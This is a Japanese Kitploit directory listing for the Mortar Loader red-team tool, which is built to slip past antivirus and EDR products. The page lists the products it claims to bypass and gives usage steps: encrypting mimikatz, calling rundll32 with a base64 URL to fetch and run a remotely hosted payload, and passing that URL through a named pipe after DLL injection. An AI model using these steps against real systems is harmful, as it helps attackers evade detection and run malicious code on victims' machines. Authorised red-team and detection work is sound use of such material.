Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
mortar — セキュリティ製品(AV/EDR/XDR)による検出および防御を回避・迂回するための回避技術 | Kitploit
ツール/GitHubGitHub/0xsp-srd/mortar
エクスプロイトフレームワークペイロード生成IDS/IPS回避シェルコードレッドチーミング
GitHub0xsp-srd/mortar

mortar

セキュリティ製品(AV/EDR/XDR)による検出および防御を回避・迂回するための回避技術

リポジトリを見る
1.5k2382年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Mortar Loader

レッドチームの回避技術で、セキュリティ製品の検知と防止を無効化し、迂回します。Mortar Loaderは、メモリストリーム内でPE/シェルコードの暗号化と復号化を行い、いくつかのインジェクション技術を活用して実行します。Mortarは、最新のアンチウイルス製品や高度なXDRソリューションをバイパスすることができ、以下についてテストされ、バイパスが確認されています。

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

更新された機能

新しいバージョンリリース(v3)には、以下の機能が含まれています。

  • ファイルレス実行(リモートステージ型暗号化バイナリまたはシェルコード)。
  • アーリーバードAPCインジェクション。
  • プロセスマスカレーディング。
  • 名前付きパイプのサポート。
  • 文字列と関数呼び出しの難読化。
  • Mortarの隠蔽リロードサブルーチン。
  • 実行遅延テクニック。

詳細な技術説明については、以下のブログ記事を参照してください。 : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

使用方法

暗号化ツール

暗号化ツールはCシェルコードとPEバイナリを暗号化し、出力を.encファイルに書き込みます。RAW形式ではなく、x64アーキテクチャであれば、任意のペイロード(MSF/Cobalt/Havocなど)を使用できます。

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Mortar Loader ライブラリ

新しいリリースでは、リモートペイロード取得と組み合わせたいくつかのテクニックを活用しています。詳細については、以下のブログ記事を参照することをお勧めします。

クイックインストラクション:

root@kitploit:~
# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

現在、アーリーバードインジェクションと名前付きパイプを組み合わせて、最終実行のための変数を受け取ることをサポートしています。

root@kitploit:~
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL 
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. payload will be executed once valid value has been recieved. 

コンパイル

このプロジェクトはFPC(Free Pascal)を使用してコーディングされています。コンパイル手順は簡単で、Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads) をダウンロードしてインストールするだけです。

暗号化ツールはリリースセクションからダウンロードするか、Lazarus IDEで簡単にコンパイルできます。

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

公開資料

  • v1リリース : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Mortar Loader v2の機能 : https://0xsp.com/offensive/mortar-loader-v2/
  • CrestCon Asia 2021での講演 : https://www.youtube.com/watch?v=H7EMBz7GLMk

スポンサー?

Mortarやその他の共有プロジェクトの開発は、私個人の時間の成果です。

  • 私の仕事に対する継続的な感謝を示す。
  • プレリリースへの早期アクセスが得られます。
  • 質問をすると回答されます。
ツールをダウンロード